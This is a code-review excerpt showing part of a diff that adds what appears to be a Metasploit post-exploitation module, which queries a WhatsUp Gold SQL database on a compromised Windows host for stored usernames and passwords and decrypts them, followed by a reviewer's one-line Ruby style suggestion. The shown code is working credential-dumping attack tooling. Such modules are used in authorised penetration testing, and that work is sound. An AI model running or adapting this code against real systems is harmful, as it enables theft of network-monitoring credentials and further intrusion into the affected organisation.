modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb

```diff
@@ -0,0 +1,683 @@
+      SELECT
+        ct.nCredentialTypeID nCredentialTypeID,
+        CONVERT(VARBINARY(1024),ct.sDisplayName) DisplayName,
+        CONVERT(VARBINARY(1024),ct.sDescription) Description,
+        CONVERT(VARBINARY(1024),ctd.sName) Username,
+        CONVERT(VARBINARY(4096),ctd.sValue) Password
+      FROM
+        [dbo].[CredentialType] AS ct
+      JOIN
+        [dbo].[CredentialTypeData] AS ctd ON(ct.nCredentialTypeID=ctd.nCredentialTypeID)
+      WHERE
+        ctd.sValue IS NOT NULL AND ctd.sValue NOT LIKE ''"
+    sql_cmd = sql_prepare(sql_query)
+    print_status('Export WhatsUp Gold DB ...')
+    query_result = cmd_exec(sql_cmd)
+    fail_with(Msf::Exploit::Failure::Unknown, query_result) if query_result.downcase.start_with?('sqlcmd: ') || query_result.downcase.start_with?('msg ')
+
+    csv = ::CSV.parse(query_result.gsub("\r", ''), row_sep: :auto, headers: export_header_row, quote_char: "\x00", skip_blanks: true)
+    fail_with(Msf::Exploit::Failure::Unknown, 'Error parsing WUG SQL dataset into CSV format') unless csv
+
+    @wug_total_secrets = csv['nCredentialTypeID'].uniq.count
+    fail_with(Msf::Exploit::Failure::Unknown, 'WUG SQL dataset contains no nCredentialTypeID column values') unless @wug_total_secrets >= 1 && !csv['nCredentialTypeID'].uniq.first.nil?
+
+    csv
+  end
+
+  def decrypt_wug_db(csv_dataset)
+    current_row = 0
+    decrypted_rows = 0
+    plaintext_rows = 0
+    blank_rows = 0
+    failed_rows = 0
+    result_csv = ::CSV.parse(result_header_row, headers: :first_row, write_headers: true, return_headers: true)
+    print_status('Process WhatsUp Gold DB ...')
+    csv_dataset.each do |row|
+      current_row += 1
+      credential_id = row['nCredentialTypeID']
+      if credential_id.nil? || credential_id.to_i < 1
+        failed_rows += 1
+        print_error("Row #{current_row} missing nCredentialTypeID column, skipping")
+        next
+      end
+      secret_displayname = [row['DisplayName'][2..]].pack('H*').delete("\000")
+      secret_description = [row['Description'][2..]].pack('H*').delete("\000")
+      secret_username = [row['Username'][2..]].pack('H*').delete("\000")
+      secret_ciphertext = [row['Password'][2..]].pack('H*').delete("\000")
+      if secret_ciphertext.nil?
+        vprint_warning("nCredentialTypeID #{credential_id} Password column nil, excluding")
+        blank_rows += 1
+        next
+      elsif secret_ciphertext.start_with?('1,0,0,0,') || secret_ciphertext.start_with?('2,0,0,0,') || secret_ciphertext.start_with?('3,0,0,0,')
+        plaintext = wug_decrypt(secret_ciphertext)
+        secret_plaintext = plaintext['Plaintext'] if plaintext.key?('Plaintext')
+        secret_disposition = plaintext['Method'] if plaintext.key?('Method')
+        decrypted_rows += 1
+      else
+        secret_plaintext = secret_ciphertext
+        secret_disposition = 'Plaintext'
+        plaintext_rows += 1
+      end
+      if secret_plaintext.nil? || secret_plaintext.empty?
```

Comment:
`blank?` will cover both the nil and empty case for strings

```suggestion
      if secret_plaintext.blank?
```